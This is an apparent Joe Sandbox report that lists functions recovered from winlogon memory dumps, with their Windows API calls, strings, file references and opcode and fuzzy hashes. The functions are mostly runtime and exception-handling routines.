Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: dda00b88d7764353b75136d53596f0d2034c14ab385f9c12ccccb40bc54c7cfa
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: E5029736629BC4C6E7608B55E49039EFBA0F7C5794F104126EA8E87BA9DF7CC494CB01

Function 000001E8589B2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001E8589B2CAD
TlsGetValue.KERNEL32 ref: 000001E8589B2CBC
TlsGetValue.KERNEL32 ref: 000001E8589B2CCB
TlsSetValue.KERNEL32 ref: 000001E8589B2E0F
TlsSetValue.KERNEL32 ref: 000001E8589B2E1E
TlsSetValue.KERNEL32 ref: 000001E8589B2E2D

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 9bdb210ca78f57e2b3e5fea9c1ca397dc87d4bd895cacbbd9e6f8d35d8661203
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: A0517C36728681CBE764DB56E844A9EF3A0FB88B85F50413A9E4E43B54DF79C846CB04

Function 000001E8589E2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001E8589E2CAD
TlsGetValue.KERNEL32 ref: 000001E8589E2CBC
TlsGetValue.KERNEL32 ref: 000001E8589E2CCB
TlsSetValue.KERNEL32 ref: 000001E8589E2E0F
TlsSetValue.KERNEL32 ref: 000001E8589E2E1E
TlsSetValue.KERNEL32 ref: 000001E8589E2E2D

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: d3db7cefbc3e86044cf3587eee183b234b7acc7443da282d1202c0cc0bf82598
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: B7518C36224681C7E365DB56E840AEEF7A4FB88B84F50413AEE8E43B54DF78C855CB00

Function 000001E8589B2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001E8589B2AE1
TlsGetValue.KERNEL32 ref: 000001E8589B2AF0
TlsGetValue.KERNEL32 ref: 000001E8589B2AFF
TlsSetValue.KERNEL32 ref: 000001E8589B2C3B
TlsSetValue.KERNEL32 ref: 000001E8589B2C4A
TlsSetValue.KERNEL32 ref: 000001E8589B2C59

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 2f63112844cbc2e4d72248b1ec1313bf988cab21f2188793efe6fc02baab0213
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: BD519D36628691CBE724DF66E8446AEF3A0FB89B85F50413ADE4E43754DF39C806CB04

Function 000001E8589E2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001E8589E2AE1
TlsGetValue.KERNEL32 ref: 000001E8589E2AF0
TlsGetValue.KERNEL32 ref: 000001E8589E2AFF
TlsSetValue.KERNEL32 ref: 000001E8589E2C3B
TlsSetValue.KERNEL32 ref: 000001E8589E2C4A
TlsSetValue.KERNEL32 ref: 000001E8589E2C59

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 3094027432e7651b27e26747100f65a4766cdb78a45eab800a4c3c54a154b69b
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 94517C36624681C7E729DF56E880AAEF7A4FB89B84F54413AEE4E43754DF38D815CB00

Function 000001E858982AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001E858982AE1
TlsGetValue.KERNEL32 ref: 000001E858982AF0
TlsGetValue.KERNEL32 ref: 000001E858982AFF
TlsSetValue.KERNEL32 ref: 000001E858982C3B
TlsSetValue.KERNEL32 ref: 000001E858982C4A
TlsSetValue.KERNEL32 ref: 000001E858982C59

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: ff61565b459b6cc4ab6afef8effed460c476408cc25a755e61abc6a78ae714e4
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 85516C36624682CBE724DF56E840AAEF3A1FB89B84F50413ADE4E43794DF38D945CB00

Function 000001E8589B5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E8589B5E66

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 576a4d25cb2ad3d533d364ac3980ec066066a7ad36a4f2dfa656199a3bc43cec
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 5161763652DA84CAEB608B16E45435EF7A0F788749F501226EE8E47BA9DF7CC540CF04

Function 000001E8589E5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E8589E5E66

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 463089987c8f33a1eb9d2aed1d740f750a7ad82977d9c8faaeebddfdef60c928
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 98619636529A84C7E7619B15E45439EFBA0FB88744F10062AEE8E87BA8DF7CC550CF01

Function 000001E858985E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E858985E66

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 9064501d9207191e0a03e88cf4adaad404ffb1d761ed384ef498a641ed770bed
Instruction ID: 6980eca10f1382f52b9f150357733d7a3c2863ef27a8fe3d946ba6cb92b3e9e2
Opcode Fuzzy Hash: 9064501d9207191e0a03e88cf4adaad404ffb1d761ed384ef498a641ed770bed
Instruction Fuzzy Hash: 9A619536529A85C6EB608B16E55479EF7A0FB88744F100226FE8E87BA8DF7DC544CF00

Function 000001E8589B3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001E8589B3A5B), ref: 000001E8589B3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E8589B3A5B), ref: 000001E8589B3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001E8589B3A5B), ref: 000001E8589B3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E8589B3A5B), ref: 000001E8589B3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001E8589B3A5B), ref: 000001E8589B3F68

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: cc01f2034c2efd82d260d9635d36fca58b9a9f6ac50cde372b3707fc042de3d5
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 8111D736619780D7EB24DB21E44429EB7B0FB45B85F040136DE4D437A8EF7EC9548784

Function 000001E8589E3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001E8589E3A5B), ref: 000001E8589E3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E8589E3A5B), ref: 000001E8589E3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001E8589E3A5B), ref: 000001E8589E3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E8589E3A5B), ref: 000001E8589E3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001E8589E3A5B), ref: 000001E8589E3F68

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: a582791d24fc43e43578601c567f0dbbeaf6fd20d84333e7a46761feeb2361dd
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: FA111936625780D3EB258B21E44469EBBB0FF44B80F080436DE4D037A8EF7EC9648784

Function 000001E8589B8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E8589B8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001E8589B8D62
RtlUnwindEx.NTDLL ref: 000001E8589B8DBC

Strings

csm, xrefs: 000001E8589B8D49

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 233396c1188e743c42982e0f32550efa5805655bcd7fbaf50f6c76a6605437ae
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 18518D32229A80CEDB54DB15E449BECB791EB98BD9F148136EE4E57B88DF79C841C700

Function 000001E8589E8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E8589E8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001E8589E8D62
RtlUnwindEx.NTDLL ref: 000001E8589E8DBC

Strings

csm, xrefs: 000001E8589E8D49

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 60e3ffb63d7929ec38420ae6f94f9aade0c22905a6a4ad2baba141073c9dcc50
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 8851DF32321A80CBEB54DB55E445BECBB91EB54B98F158136DE8E57B88DF78C8A1C700

Function 000001E858988CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E858988CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001E858988D62
RtlUnwindEx.NTDLL ref: 000001E858988DBC

Strings

csm, xrefs: 000001E858988D49

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: c58bdb417acd5e09c80ce1f1c2e610612fa4b6b3262c9fb971c576ef81a4499d
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 1951AC32321A82CBEB54DB15E445BEDB792EB54B98F148132EE4E57B89DF78C841CB10

Function 000001E8589BAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E8589BAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001E8589BABBC

Strings

csm, xrefs: 000001E8589BAAF6
csm, xrefs: 000001E8589BAC0E

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 44ad39f614c0e5e6e16df9b5801fd44f7e32b9a3e2469b621c4dd723b53084d2
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: AC514B322296C4CEEB648B22D94439CBBE1FB95B96F144127DE9D47B95CF38C850C702

Function 000001E8589BA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001E8589BA75B
_CallSETranslator.LIBVCRUNTIME ref: 000001E8589BA7A7

Strings

MOC, xrefs: 000001E8589BA76F
RCC, xrefs: 000001E8589BA777

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 05b550294fc46059f422ccd144b92c8f6dc198d183ea70f41fb266f34509afe2
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 2E617B32629BC4C9EB608B15E4407DEB7A0FB85B99F044226EF9C13B99DF78C190CB01

Function 000001E8589EAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E8589EAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001E8589EABBC

Strings

csm, xrefs: 000001E8589EAAF6
csm, xrefs: 000001E8589EAC0E

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 73ca63169611282b1fd76395518590c23ed5720bfcd024d47443764454fedbce
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: D5512D322206C0CBEB648B15D54439DBBE1FBA5B98F184127DE9D47BA5CF38D461C702

Function 000001E8589EA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001E8589EA75B
_CallSETranslator.LIBVCRUNTIME ref: 000001E8589EA7A7

Strings

RCC, xrefs: 000001E8589EA777
MOC, xrefs: 000001E8589EA76F

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 53fc76e044395b4f7f4c0e363ea9e36206b6e0e3be26f9c575fcb892ae53d47f
